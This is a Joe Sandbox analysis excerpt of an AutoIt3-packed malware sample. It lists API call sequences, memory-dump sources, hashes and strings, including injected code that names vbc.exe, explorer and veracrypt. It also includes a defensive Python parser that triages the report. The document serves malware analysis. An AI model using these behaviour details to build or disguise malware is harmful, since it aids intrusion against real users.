                                      • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                      • String ID:
                                      • API String ID: 3430376129-0
                                      • Opcode ID: 11c4f018c9b5dfae91fa686f3d5e2957ea2e9e1816f32abb7dc68ba6b6c6b1db
                                      • Instruction ID: 07e9f9f46cf4a3ba7d600cf19d7c643c6eb1f073a7816e587a5b8f9d729a9138
                                      • Opcode Fuzzy Hash: 11c4f018c9b5dfae91fa686f3d5e2957ea2e9e1816f32abb7dc68ba6b6c6b1db
                                      • Instruction Fuzzy Hash: B7114C32500205BFDBA16FA4EC0CBA97BB1FF58321F144266FA66A50E1CB710951EF50
                                      APIs
                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0080ADE1
                                      • OleUninitialize.OLE32(?,00000000), ref: 0080AE80
                                      • UnregisterHotKey.USER32(?), ref: 0080AFD7
                                      • DestroyWindow.USER32(?), ref: 00842F64
                                      • FreeLibrary.KERNEL32(?), ref: 00842FC9
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00842FF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                      • String ID: close all
                                      • API String ID: 469580280-3243417748
                                      • Opcode ID: 9a215c44a92efb17f13ecd22f0b576898acf52ed7053fc81a079fcd1a8c158df
                                      • Instruction ID: a4fd5a79508ea35efd2270c53bf1999e92c4fb8e67f6eeb0cbf00c6183702b61
                                      • Opcode Fuzzy Hash: 9a215c44a92efb17f13ecd22f0b576898acf52ed7053fc81a079fcd1a8c158df
                                      • Instruction Fuzzy Hash: C0A16D707012168FCB69EF14C895A69F764FF04740F5442ADE90AEB292CF31AD56CF92
                                      APIs
                                      • EnumChildWindows.USER32(?,0085B13A), ref: 0085B078
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ChildEnumWindows
                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                      • API String ID: 3555792229-1603158881
                                      • Opcode ID: 51eb63d71b12f01ec5d081b25e824944b40758c5663950af6436814713241498
                                      • Instruction ID: 940035ee1ffc151fcc14832e51c3b4ae4d09695e4bc7df6e473ea4c0e4f3faa7
                                      • Opcode Fuzzy Hash: 51eb63d71b12f01ec5d081b25e824944b40758c5663950af6436814713241498
                                      • Instruction Fuzzy Hash: 26918270500516AACB1CEFA4C481BEAFB75FF14305F508219ED5AE7251DF30699DCBA2
                                      APIs
                                      • SetWindowLongW.USER32(?,000000EB), ref: 0080327E
                                        • Part of subcall function 0080218F: GetClientRect.USER32(?,?), ref: 008021B8
                                        • Part of subcall function 0080218F: GetWindowRect.USER32(?,?), ref: 008021F9
                                        • Part of subcall function 0080218F: ScreenToClient.USER32(?,?), ref: 00802221
                                      • GetDC.USER32 ref: 0083D073
                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0083D086
                                      • SelectObject.GDI32(00000000,00000000), ref: 0083D094
                                      • SelectObject.GDI32(00000000,00000000), ref: 0083D0A9
                                      • ReleaseDC.USER32(?,00000000), ref: 0083D0B1
                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0083D13C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                      • String ID: U
                                      • API String ID: 4009187628-3372436214
                                      • Opcode ID: 9ca2246c194e7a0f9f6e62a673a263fdcde69de04036afd55097e7e3ba640636
                                      • Instruction ID: 492cf6b77a6455bc9c1a3853b531a6a59f335ac775eeac40c01cb111133463d7
                                      • Opcode Fuzzy Hash: 9ca2246c194e7a0f9f6e62a673a263fdcde69de04036afd55097e7e3ba640636
                                      • Instruction Fuzzy Hash: BE712031400309EFCF25DF68DC84AAA7BB5FF89325F14426AED51DA2A6C7318841DFA0
                                      APIs
                                      • GetCurrentProcessId.KERNEL32 ref: 03CEB3E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProcess
                                      • String ID: conhost.exe$explorer$lp.txt$proce$update$vbc.exe$veracrypt
                                      • API String ID: 2050909247-3686906338
                                      • Opcode ID: b83310e7ae9a8f47af29cfd07551eff70202ee91e9652debb6926789c352fd53
                                      • Instruction ID: 91c2892f2a42d37ddc06b1c504868c6e892703fd009d13685102deae81038344
                                      • Opcode Fuzzy Hash: b83310e7ae9a8f47af29cfd07551eff70202ee91e9652debb6926789c352fd53
                                      • Instruction Fuzzy Hash: 1D71493861436D8BDF25EB61CC90ADDB3B9EF44304F0181E5D958EB254EA70AF859F80
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                        • Part of subcall function 00802714: GetCursorPos.USER32(?), ref: 00802727
                                        • Part of subcall function 00802714: ScreenToClient.USER32(008C77B0,?), ref: 00802744
                                        • Part of subcall function 00802714: GetAsyncKeyState.USER32(00000001), ref: 00802769
                                        • Part of subcall function 00802714: GetAsyncKeyState.USER32(00000002), ref: 00802777
                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0088C69C
                                      • ImageList_EndDrag.COMCTL32 ref: 0088C6A2
                                      • ReleaseCapture.USER32 ref: 0088C6A8
                                      • SetWindowTextW.USER32(?,00000000), ref: 0088C752
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0088C765
                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0088C847
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                      • API String ID: 1924731296-2107944366
                                      • Opcode ID: b58ab3155ec57b7f782be148cd01864e02e7f50332453991c5d359e8135b2d56
                                      • Instruction ID: ef749552c4afbbe258cb3cdd72ad714eca966e2766b2a6238a11b570f8694ff5
                                      • Opcode Fuzzy Hash: b58ab3155ec57b7f782be148cd01864e02e7f50332453991c5d359e8135b2d56
                                      • Instruction Fuzzy Hash: 66516970608205AFDB10EF18CC59FAA7BE5FB84310F04452DFAA5872E1DB70A955CF66
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0087211C
                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00872148
                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0087218A
                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0087219F
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008721AC
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 008721DC
                                      • InternetCloseHandle.WININET(00000000), ref: 00872223
                                        • Part of subcall function 00872B4F: GetLastError.KERNEL32(?,?,00871EE3,00000000,00000000,00000001), ref: 00872B64
                                        • Part of subcall function 00872B4F: SetEvent.KERNEL32(?,?,00871EE3,00000000,00000000,00000001), ref: 00872B79
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                      • String ID:
                                      • API String ID: 2603140658-3916222277
                                      • Opcode ID: cbe22e3da34ae9a09bcdfcc5523d420a16c86d587ddbd66884ae561899dd6454
                                      • Instruction ID: f6650f313e65a51a8ed12c1ba627acf155859d977f3f71a567dca9a6fc8a9a73
                                      • Opcode Fuzzy Hash: cbe22e3da34ae9a09bcdfcc5523d420a16c86d587ddbd66884ae561899dd6454
                                      • Instruction Fuzzy Hash: 9C416DB1500208BEEB129F50CC85FBB7BACFF08364F048116FA19DA156D771EE449BA1
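The function blocks above repeat one layout (APIs, Memory Dump Source, Similarity). Two details in them are what a triager reads first: the GetCurrentProcessId function at 03CEB3E3 sits in a dump marked "based on PE: false" (the region at 03CC1000 has no image on disk behind it, unlike the AutoIt3 runtime at 00800000) and carries Yara matches plus process-name strings, and the WinINet helper at 0087211C queries and then sets option 0000001F, which is INTERNET_OPTION_SECURITY_FLAGS in wininet.h, the usual query-modify-set way of relaxing certificate checks. The parser below is an added example, not Joe Sandbox or DarkGate code: it turns blocks in this layout into records and applies those checks. The sample text is a constructed excerpt copied from the two blocks above; the record fields and finding strings are this example's own, and the security-flag value itself is behind the lpBuffer argument, so the finding only says the option was rewritten and leaves confirming the flag to the dump.

```python
"""Parse Joe Sandbox function blocks (APIs / Memory Dump Source / Similarity)
into records and triage them. Added example; not Joe Sandbox or DarkGate code."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed excerpt in the report's own layout: two blocks copied from the
# report (WinINet helper in the AutoIt3 image at 0x800000, and the
# GetCurrentProcessId function in the non-PE-backed region at 0x3CC1000).
SAMPLE_REPORT = """\
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0087211C
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00872148
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0087218A
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0087219F
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008721AC
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 008721DC
• InternetCloseHandle.WININET(00000000), ref: 00872223
  • Part of subcall function 00872B4F: GetLastError.KERNEL32(?,?,00871EE3,00000000,00000000,00000001), ref: 00872B64
Strings
Memory Dump Source
• Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
• Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
• String ID:
• API String ID: 2603140658-3916222277
• Opcode ID: cbe22e3da34ae9a09bcdfcc5523d420a16c86d587ddbd66884ae561899dd6454
APIs
• GetCurrentProcessId.KERNEL32 ref: 03CEB3E3
Strings
Memory Dump Source
• Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
Yara matches
Similarity
• API ID: CurrentProcess
• String ID: conhost.exe$explorer$lp.txt$proce$update$vbc.exe$veracrypt
• API String ID: 2050909247-3686906338
• Opcode ID: b83310e7ae9a8f47af29cfd07551eff70202ee91e9652debb6926789c352fd53
"""

# "• Name.MODULE(args), ref: ADDR", optionally prefixed as a subcall; args and
# the comma are absent when the call takes no resolved arguments.
API_RE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
SRC_RE = re.compile(
    r"^•\s*Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<off>[0-9A-F]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

INTERNET_OPTION_SECURITY_FLAGS = 0x1F  # wininet.h


@dataclass
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int
    subcall: bool


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    offset: Optional[int] = None
    pe_backed: Optional[bool] = None
    yara_match: bool = False
    strings: List[str] = field(default_factory=list)
    api_id: str = ""
    opcode_id: str = ""


def parse_report(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                 # every function block opens with this heading
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        if line == "Yara matches":         # heading is only present when a rule hit
            cur.yara_match = True
            continue
        m = API_RE.match(line)
        if m:
            args = tuple(a for a in (m.group("args") or "").split(",") if a)
            cur.apis.append(ApiCall(m.group("api"), m.group("mod"), args,
                                    int(m.group("ref"), 16), m.group("sub") is not None))
            continue
        m = SRC_RE.match(line)
        if m:
            cur.offset = int(m.group("off"), 16)
            cur.pe_backed = m.group("pe") == "true"
            continue
        m = FIELD_RE.match(line)
        if m:
            key, val = m.group("key"), m.group("val")
            if key == "String ID":         # '$'-joined list, empty when the function has none
                cur.strings = [s for s in val.split("$") if s]
            elif key == "API ID":
                cur.api_id = val
            elif key == "Opcode ID":
                cur.opcode_id = val
    return records


def triage(records: List[FunctionRecord]) -> List[Tuple[int, str]]:
    """Return (record index, finding) pairs a triager would look at first."""
    findings: List[Tuple[int, str]] = []
    for i, r in enumerate(records):
        if r.pe_backed is False:           # no image on disk behind this code: unpacked/injected
            findings.append((i, f"non-PE-backed code at {r.offset:08X}"))
        if r.yara_match:
            findings.append((i, "yara match"))
        # query then set on INTERNET_OPTION_SECURITY_FLAGS: the value written lives
        # behind lpBuffer, so only report the rewrite and confirm the flag in the dump
        touched = {a.api for a in r.apis
                   if a.api in ("InternetQueryOptionW", "InternetSetOptionW")
                   and len(a.args) > 1 and a.args[1] == f"{INTERNET_OPTION_SECURITY_FLAGS:08X}"}
        if touched == {"InternetQueryOptionW", "InternetSetOptionW"}:
            findings.append((i, "INTERNET_OPTION_SECURITY_FLAGS rewritten"))
        procs = [s for s in r.strings if s.endswith(".exe")]
        if procs:
            findings.append((i, "process names: " + ", ".join(procs)))
    return findings


if __name__ == "__main__":
    recs = parse_report(SAMPLE_REPORT)
    for idx, note in triage(recs):
        print(f"function[{idx}] @ {recs[idx].offset:08X}: {note}")
```

Run against a full report export, the same loop separates the AutoIt3 runtime's own helpers (every function at 00800000 is PE-backed and carries no Yara hit) from the unpacked code, which is where the process-name checks and anything worth signaturing live.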
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00890980), ref: 00879412
                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00890980), ref: 00879446
                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 008795C0
                                      • SysFreeString.OLEAUT32(?), ref: 008795EA
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                      • String ID:
                                      • API String ID: 560350794-0
                                      • Opcode ID: 9caba30c2372447a5514b9f6a09463a8c1247d7ccaa634fe471d7023974d7e9e
                                      • Instruction ID: 0929d0aca78bda8187d9f610e24d29031f103f505a59f35b33a3b92daa730649
                                      • Opcode Fuzzy Hash: 9caba30c2372447a5514b9f6a09463a8c1247d7ccaa634fe471d7023974d7e9e
                                      • Instruction Fuzzy Hash: E8F12771A00219AFCB14DF94C884EAEB7B9FF45355F148058F95AEB254CB31EE45CB90
                                      APIs
                                      • _memset.LIBCMT ref: 0087FD9E
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0087FF31
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0087FF55
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0087FF95
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0087FFB7
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00880133
                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00880165
                                      • CloseHandle.KERNEL32(?), ref: 00880194
                                      • CloseHandle.KERNEL32(?), ref: 0088020B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                      • String ID:
                                      • API String ID: 4090791747-0
                                      • Opcode ID: 2bfddf1ff78b4dd546defa5cb76757e612e84dacb96d1792dc275c06ae9aa7a8
                                      • Instruction ID: 710d868dea315e6aafc27c21cdee52cf35e628b844edb62be70a5fc1930daa9d
                                      • Opcode Fuzzy Hash: 2bfddf1ff78b4dd546defa5cb76757e612e84dacb96d1792dc275c06ae9aa7a8
                                      • Instruction Fuzzy Hash: AFE1AB312046019FCB54EF29C891A6ABBE1FF85314F18856DF999DB2A2CB31EC45CF52
                                      APIs
                                        • Part of subcall function 00864BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00863B8A,?), ref: 00864BE0
                                        • Part of subcall function 00864BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00863B8A,?), ref: 00864BF9
                                        • Part of subcall function 00864FEC: GetFileAttributesW.KERNEL32(?,00863BFE), ref: 00864FED
                                      • lstrcmpiW.KERNEL32(?,?), ref: 008652FB
                                      • _wcscmp.LIBCMT ref: 00865315
                                      • MoveFileW.KERNEL32(?,?), ref: 00865330
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                      • String ID:
                                      • API String ID: 793581249-0
                                      • Opcode ID: d75b0848879d8bbc2630de896bb489a97eca6474fd4e16dd679b6455c2fd3b74
                                      • Instruction ID: f7b0a5d57b8e29ea148602e945ce2c29dc5d1b15e06d4eaa50b267f427110683
                                      • Opcode Fuzzy Hash: d75b0848879d8bbc2630de896bb489a97eca6474fd4e16dd679b6455c2fd3b74
                                      • Instruction Fuzzy Hash: 2D5174B20083855BC764EBA4D8919DFB7ECFF84340F500A1EB289C3152EF34A6888757
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00888D24
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: ffa9edd9642303e7b7e0cd535adc5a4120cfbdddaf2795002d6f06be81b7e1f4
                                      • Instruction ID: 78ea725c19e31404b699d99bfa36778d7d39e4d0e3e84eebc2e5608e90bf127e
                                      • Opcode Fuzzy Hash: ffa9edd9642303e7b7e0cd535adc5a4120cfbdddaf2795002d6f06be81b7e1f4
                                      • Instruction Fuzzy Hash: B7519C30640208FFEBB4BF288C89B997B65FB15324FA44512FA15EB1E1CB71A990DB51
                                      APIs
                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0083C638
                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0083C65A
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0083C672
                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0083C690
                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0083C6B1
                                      • DestroyIcon.USER32(00000000), ref: 0083C6C0
                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0083C6DD
                                      • DestroyIcon.USER32(?), ref: 0083C6EC
                                        • Part of subcall function 0088AAD4: DeleteObject.GDI32(00000000), ref: 0088AB0D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                      • String ID:
                                      • API String ID: 2819616528-0
                                      • Opcode ID: 1e59bfac93bc3e4c5f62360ac0191eb4ede73fe94f8b0aecbd5682e34adf3c81
                                      • Instruction ID: d6187c32b7aba3e7a33b2e57a88d73b20c434ab56a9325e4986241e5ccb5143b
                                      • Opcode Fuzzy Hash: 1e59bfac93bc3e4c5f62360ac0191eb4ede73fe94f8b0aecbd5682e34adf3c81
                                      • Instruction Fuzzy Hash: 7A51397060020AAFDB64DF24CC49FAA7BB5FB94750F104529F946E72D0EBB1A950DF90
                                      APIs
                                        • Part of subcall function 0085B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0085B54D
                                        • Part of subcall function 0085B52D: GetCurrentThreadId.KERNEL32 ref: 0085B554
                                        • Part of subcall function 0085B52D: AttachThreadInput.USER32(00000000,?,0085A23B,?,00000001), ref: 0085B55B
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0085A246
                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0085A263
                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0085A266
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0085A26F
                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0085A28D
                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0085A290
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0085A299
                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0085A2B0
                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0085A2B3
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                      • String ID:
                                      • API String ID: 2014098862-0
                                      • Opcode ID: 4ff738aae74bb03b4ceed2941815c30044c874f38f7499d8934719387c652ea4
                                      • Instruction ID: 885ea7c3bdc798982daa4555a89cef41895546d45791129635366f9c4046b380
                                      • Opcode Fuzzy Hash: 4ff738aae74bb03b4ceed2941815c30044c874f38f7499d8934719387c652ea4
